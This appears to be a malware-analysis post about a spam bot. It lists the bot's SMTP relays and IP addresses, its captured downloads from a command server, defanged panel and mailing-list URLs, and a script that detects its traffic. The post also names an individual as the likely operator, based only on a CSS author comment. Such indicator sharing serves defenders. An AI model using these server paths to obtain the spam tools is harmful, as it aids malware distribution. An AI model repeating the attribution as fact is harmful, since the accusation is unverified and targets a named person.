Email spam is sent via these SMTP servers:
“cdptpa-pub-iedge-vip.email.rr.com”
“smtp.orange.fr”
“smtp.sina.com”
“smtp.googlemail.com”
“smtp.tiscali.co.uk”
“out.alice.it”
Servers used to spam:
“173.194.195.16:25”
“78.47.198.134:80”
“62.24.139.11:25”
“107.14.166.70:25”
“193.252.22.86:25”
“82.57.200.132:25”
“202.108.6.242:25”
Downloaded files:
“GET /libeay32.dll HTTP/1.0
Host: 78.47.198.134
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6
User-Agent: Mozilla/4.0 (compatible; Synapse)”
“GET /ssleay32.dll HTTP/1.0
Host: 78.47.198.134
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6
User-Agent: Mozilla/4.0 (compatible; Synapse)”
“GET /cmd.php HTTP/1.0
Host: 78.47.198.134
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6
User-Agent: Mozilla/4.0 (compatible; Synapse)”
“GET /go_mails/botid-1761_8542.txt HTTP/1.0
Host: 78.47.198.134
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6
User-Agent: Mozilla/4.0 (compatible; Synapse)”
“GET /header/name.txt HTTP/1.0
Host: 78.47.198.134
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6
User-Agent: Mozilla/4.0 (compatible; Synapse)”
“GET /go_attach/invoice_A5twhy.zip HTTP/1.0
Host: 78.47.198.134
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6
User-Agent: Mozilla/4.0 (compatible; Synapse)”
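The requests above share a small set of traits that can be matched in proxy or packet-capture data. The following detection sketch is an added example, not part of the original post; the function names, reason labels and scoring are assumptions chosen for illustration, and the two sample requests are constructed (the first mirrors a request from this page).

```python
import re

# Traits taken from the requests captured on this page.
BOT_UA = "Mozilla/4.0 (compatible; Synapse)"
SSL_DLLS = {"/libeay32.dll", "/ssleay32.dll"}  # OpenSSL libraries fetched first
BOT_PATHS = re.compile(r"^/(go_mails|go_attach|header)/|^/cmd\.php$")
BARE_IP = re.compile(r"^\d{1,3}(\.\d{1,3}){3}(:\d+)?$")

def parse_request(raw):
    """Split a raw HTTP request into (method, path, version, headers)."""
    text = raw.strip().strip("“”")  # tolerate the quoting style used on the page
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers

def score_request(raw):
    """Return (score, reasons); a higher score is closer to the bot's traffic."""
    try:
        method, path, version, headers = parse_request(raw)
    except (ValueError, IndexError):
        return 0, ["unparseable"]
    reasons = []
    if headers.get("user-agent") == BOT_UA:
        reasons.append("synapse-user-agent")
    if version == "HTTP/1.0" and "keep-alive" in headers:
        reasons.append("http1.0-with-keep-alive-header")
    if BARE_IP.match(headers.get("host", "")):
        reasons.append("bare-ip-host")
    if path in SSL_DLLS:
        reasons.append("openssl-dll-download")
    if BOT_PATHS.search(path):
        reasons.append("bot-panel-path")
    return len(reasons), reasons

# Constructed samples: the first mirrors a request from the page, the second is benign.
BOT_SAMPLE = """GET /libeay32.dll HTTP/1.0
Host: 78.47.198.134
Keep-Alive: 300
User-Agent: Mozilla/4.0 (compatible; Synapse)"""
BENIGN_SAMPLE = """GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64)"""

if __name__ == "__main__":
    print(score_request(BOT_SAMPLE), score_request(BENIGN_SAMPLE))
```

The Synapse user agent is the default of a general-purpose networking library, so it is a weak signal alone; alert on a combination of reasons rather than on any single one.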
Attachments used to spread are here: hxxp://78.47.198.134/go_attach/
The email lists are here: hxxp://78.47.198.134/go_mails/
A mail list of around 1GB is here: hxxp://78.47.198.134/header/m.txt
The names used to spam are here: hxxp://78.47.198.134/header/name.txt
Login to the bot panel: hxxp://78.47.198.134/index.php
Probably the name of the guy behind the bot is in /style/spamm.css, which you can see when you open the page source of the login panel:
/* Author: Vitaly Voskobovich */
/* Web-site: www.voskobovich.com */
Hosting info:
http://whois.domaintools.com/78.47.198.134
Anonymous - March 25, 2016 at 6:47 am
post the source of the server